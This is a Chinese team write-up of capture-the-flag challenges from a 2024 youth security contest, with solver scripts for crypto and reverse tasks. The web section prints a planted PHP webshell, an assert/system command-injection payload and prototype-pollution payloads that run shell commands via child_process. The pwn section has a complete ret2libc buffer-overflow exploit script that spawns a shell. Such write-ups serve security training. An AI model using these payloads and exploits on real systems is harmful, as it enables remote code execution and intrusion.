2024强网杯青少年专项赛初赛团队wp

2024强网杯青少年专项赛初赛团队wp

战绩:rk11
有幸参加线下赛,但是题目忘了,附件也没有留(

Misc

1.签到漫画

看4幅漫画,得到4个1/4二维码,拼接扫描即可。

2.whitepic

查看文件格式为gif

image-20241124122902265

拆帧

image-20241124122922796

flag{passion_is_the_greatest_teacher}

Crypto

1.Classics

CyberChef逆向,根据加密来解密

image.png

2.AliceAES

根据题目要求,用给定的key和iv对Hello, Bob!进行AES加密

image.png

image.png

3.easymath

根据加密写出解密脚本

from Crypto.Util.number import *
from gmpy2 import next_prime, invert

# RSA parameters handed out by the challenge: public modulus n and ciphertext c.
n = 739243847275389709472067387827484120222494013590074140985399787562594529286597003777105115865446795908819036678700460141950875653695331369163361757157565377531721748744087900881582744902312177979298217791686598853486325684322963787498115587802274229739619528838187967527241366076438154697056550549800691528794136318856475884632511630403822825738299776018390079577728412776535367041632122565639036104271672497418509514781304810585503673226324238396489752427801699815592314894581630994590796084123504542794857800330419850716997654738103615725794629029775421170515512063019994761051891597378859698320651083189969905297963140966329378723373071590797203169830069428503544761584694131795243115146000564792100471259594488081571644541077283644666700962953460073953965250264401973080467760912924607461783312953419038084626809675807995463244073984979942740289741147504741715039830341488696960977502423702097709564068478477284161645957293908613935974036643029971491102157321238525596348807395784120585247899369773609341654908807803007460425271832839341595078200327677265778582728994058920387721181708105894076110057858324994417035004076234418186156340413169154344814582980205732305163274822509982340820301144418789572738830713925750250925049059
c = 229043746793674889024653533006701296308351926745769842802636384094759379740300534278302123222014817911580006421847607123049816103885365851535481716236688330600113899345346872012870482410945158758991441294885546642304012025685141746649427132063040233448959783730507539964445711789203948478927754968414484217451929590364252823034436736148936707526491427134910817676292865910899256335978084133885301776638189969716684447886272526371596438362601308765248327164568010211340540749408337495125393161427493827866434814073414211359223724290251545324578501542643767456072748245099538268121741616645942503700796441269556575769250208333551820150640236503765376932896479238435739865805059908532831741588166990610406781319538995712584992928490839557809170189205452152534029118700150959965267557712569942462430810977059565077290952031751528357957124339169562549386600024298334407498257172578971559253328179357443841427429904013090062097483222125930742322794450873759719977981171221926439985786944884991660612824458339473263174969955453188212116242701330480313264281033623774772556593174438510101491596667187356827935296256470338269472769781778576964130967761897357847487612475534606977433259616857569013270917400687539344772924214733633652812119743

e = 65537  # public exponent
l = 2331   # length parameter for count_sequences(); its result seeds the prime p

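def count_sequences(n):
    """Count binary strings of length ``n`` that start and end with ``1`` and
    never contain more than three equal bits in a row.

    The DP state is ``(last_bit, run_length)``: the most recent bit and how
    many times it has repeated at the end of the string.  A bit may be
    appended only while it does not extend a run beyond three.

    Args:
        n: length of the strings to count.

    Returns:
        The number of such strings; ``0`` when ``n < 1`` (the original
        indexed ``dp[1]`` and raised ``IndexError`` in that case).

    NOTE(review): the published listing lost its indentation, so where the
    two ``else`` branches belong is ambiguous.  They are attached to the
    outer ``if`` here (a bit that differs from the previous one always starts
    a run of length 1).  Attaching them to the inner ``if`` would make the
    function return 1 for every ``n``, which cannot be the intended key.
    """
    if n < 1:
        return 0
    # state -> number of strings reaching it; the only string of length 1 is "1"
    states = {(1, 1): 1}
    for _ in range(1, n):
        nxt = {}
        for (last_bit, run), count in states.items():
            for bit in (0, 1):
                if bit != last_bit:
                    new_state = (bit, 1)
                elif run < 3:
                    new_state = (bit, run + 1)
                else:
                    # appending would create a run of four equal bits: forbidden
                    continue
                nxt[new_state] = nxt.get(new_state, 0) + count
        states = nxt
    # only strings whose final bit is 1 contribute to the key
    return sum(count for (last_bit, _), count in states.items() if last_bit == 1)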

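key = count_sequences(l)

# p is the next prime at or above the DP count; presumably this mirrors how
# the challenge generated its key (the writeup says the solver was written
# from the encryption side).
p = int(next_prime(key))
# Sanity check: if the key were wrong, pow() below would silently print
# garbage (or raise on decode) instead of pointing at the real problem.
if n % p != 0:
    raise ValueError("next_prime(key) does not divide n; check count_sequences()/l")
q = n // p

phi = (p - 1) * (q - 1)
d = invert(e, phi)

m = pow(c, d, n)
flag = long_to_bytes(m)
print(flag.decode())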

flag{77310934-21fa-4ee4-a783-dc1865ebab28}

Reverse

1.EnterGame

分析main函数,找到加密函数和加密后的flag→s2

image.png

分析加密函数

image.png

a3为用户输入的flag,a4是加密后的flag(即s2)

动调可以提取v16的值,并写异或解密脚本

/* XOR table recovered at runtime by dynamic debugging (v16 in the decompiled
 * encryption routine), 65 bytes.  The decryption loop below XORs it
 * byte-by-byte with enflag, so only the first 42 entries are actually used. */
unsigned char v16[] =
{
0x38, 0x7F, 0xCB, 0xB4, 0xFC, 0x46, 0x13, 0x4F, 0x22, 0x27,
0x31, 0xC2, 0x2D, 0x53, 0x25, 0xB4, 0x58, 0x6F, 0x75, 0x74,
0x67, 0x20, 0x53, 0x74, 0x71, 0x65, 0x6E, 0x67, 0x73, 0x68,
0x65, 0x6E, 0x9A, 0xE4, 0x9E, 0xB8, 0x86, 0xCF, 0x69, 0x3F,
0xAA, 0xBC, 0x94, 0x90, 0x84, 0xDD, 0xFE, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x2F, 0x31, 0x32, 0x33,
0x33, 0x35, 0x36, 0x37, 0x60
};

/* Encrypted flag as embedded in the binary (s2 in the writeup), 43 bytes;
 * the loop below decrypts the first 42 of them. */
unsigned char enflag[] =
{
0x5E, 0x13, 0xAA, 0xD3, 0x87, 0x75, 0x2B, 0x7A, 0x1B, 0x16,
0x04, 0xA3, 0x49, 0x7E, 0x1D, 0xD2, 0x6B, 0x5D, 0x58, 0x40,
0x5E, 0x44, 0x63, 0x59, 0x48, 0x51, 0x0D, 0x54, 0x5E, 0x58,
0x55, 0x58, 0xAD, 0x82, 0xAF, 0xDC, 0xE7, 0xAB, 0x58, 0x5D,
0xCE, 0xC1, 0x32
};
#include <stdio.h>

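int main() {
    /* Recover the flag as flag[k] = v16[k] ^ enflag[k].
     * The decompiled routine walks its input in 64-byte blocks (the original
     * `i += 64` / `j <= 63` loops); with only 42 relevant bytes that is a
     * single pass, so it is written as one loop here. */
    enum { FLAG_LEN = 42 };   /* enflag bytes that belong to the flag */
    int k;
    /* Zero-initialised with room for a terminator: the original left flag[]
     * uninitialised and never wrote a NUL, so printf("%s") read past the
     * decrypted bytes (undefined behaviour, possibly trailing garbage). */
    char flag[FLAG_LEN + 1] = {0};
    /* XOR table extracted at runtime (v16 in the decompiler output). */
    unsigned char v16[] =
    {
    0x38, 0x7F, 0xCB, 0xB4, 0xFC, 0x46, 0x13, 0x4F, 0x22, 0x27,
    0x31, 0xC2, 0x2D, 0x53, 0x25, 0xB4, 0x58, 0x6F, 0x75, 0x74,
    0x67, 0x20, 0x53, 0x74, 0x71, 0x65, 0x6E, 0x67, 0x73, 0x68,
    0x65, 0x6E, 0x9A, 0xE4, 0x9E, 0xB8, 0x86, 0xCF, 0x69, 0x3F,
    0xAA, 0xBC, 0x94, 0x90, 0x84, 0xDD, 0xFE, 0xFF, 0xFF, 0xFF,
    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x2F, 0x31, 0x32, 0x33,
    0x33, 0x35, 0x36, 0x37, 0x60
    };
    /* Encrypted flag embedded in the binary (s2 in the writeup). */
    unsigned char enflag[] =
    {
    0x5E, 0x13, 0xAA, 0xD3, 0x87, 0x75, 0x2B, 0x7A, 0x1B, 0x16,
    0x04, 0xA3, 0x49, 0x7E, 0x1D, 0xD2, 0x6B, 0x5D, 0x58, 0x40,
    0x5E, 0x44, 0x63, 0x59, 0x48, 0x51, 0x0D, 0x54, 0x5E, 0x58,
    0x55, 0x58, 0xAD, 0x82, 0xAF, 0xDC, 0xE7, 0xAB, 0x58, 0x5D,
    0xCE, 0xC1, 0x32
    };

    for (k = 0; k < FLAG_LEN; ++k)
        flag[k] = (char)(v16[k] ^ enflag[k]);
    printf("%s\n", flag);
    return 0;
}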

flag{385915ad-8f32-49d0-94c3-0067f1dad1bd}

2.Flip_over

jadx发现加载了lib,并且对用户输入进行check

image.png

来到so文件

image.png

发现加密函数

rc4

des加密

最后异或加密

提取数据

image.png

丢进赛博厨子

image.png

出flag

Web

1.ezGetFlag

网页源码中发现一个backend.php,

image.png

点击网页按钮提示

image.png

所以使用post方法访问backend.php

即可得到flag

2.ezFindShell

在1de9d9a55a824f4f8b6f37af76596baa.php发现post

image-20241124192413375

存在漏洞代码

// NOTE(review): this is the webshell found in the challenge, not code to keep.
// $e is client-controlled (any request parameter) and, after base64_decode(),
// is handed to array_filter() as its callback, so the client chooses which
// function gets applied to $_POST['POST'].  Remediation: remove the file and
// never derive a callable from request data.
$e=$_REQUEST['e'];$arr=array($_POST['POST'],);array_filter($arr,base64_decode($e));
?>

base64_decode($e)的结果作为回调函数,可能导致任意代码执行

构造post:POST=system(“cat /flag”)&e=YXNzZXJ0

image-20241124193833136

3.cyberboard

src中均为js文件,联想到原型链污染

在src中发现admin,登录

cyber1

image-20241124183400276

在Message.js中的save方法使用JSON.parse解析输入,可以尝试原型链污染

image-20241124184015039

尝试payload:

{"content":"123","__proto__":{"block": {"type":"Text","line":"process.mainModule.require('child_process').exec('whoami')"}}}

发现没有回显,尝试写入文件

payload:

{"__proto__":{"block":{"type":"Text","line":"process.mainModule.require('child_process').execSync('cat /f* > /app/public/aaaaaa.txt')"}}}

访问url/aaaaaa.txt

image-20241124184851340

PWN

1.clock_in

查看保护

image-20241124143848587

fgets读取长度远大于s,可以溢出

image-20241124143725859

from pwn import *

# Local process line kept for offline testing; the remote line is the
# competition instance.
#io=process("./clock_in")
io=remote("123.56.237.38", 28685)

# Root cause (per the writeup): fgets() reads far more than the size of the
# stack buffer s.  The program-side fix is to bound the read to sizeof(s).
# 64+8 is the offset the author determined (presumably 64-byte buffer plus
# saved frame pointer).  The four fixed addresses come from the challenge
# binary and are meaningless without it.
payload = b"A"*(64+8) + p64(0x4011C5) + p64(0x403FD8) + p64(0x401060) + p64(0X401207)
io.sendline(payload)
# Take the 6-byte pointer preceding the 0x7f byte in the output and widen it to 8.
A=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

log.info(f"A: {hex(A)}")
# Rebase the supplied libc by treating the leaked value as the address of puts.
libc = ELF("./libc.so.6")
libc_base = A - libc.symbols['puts']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b"/bin/sh"))
# Second write through the same unbounded read, now with libc-relative values.
payload = b"A"*(64+8) + p64(0x4011C5) + p64(binsh) + p64(system)
io.sendline(payload)
io.interactive()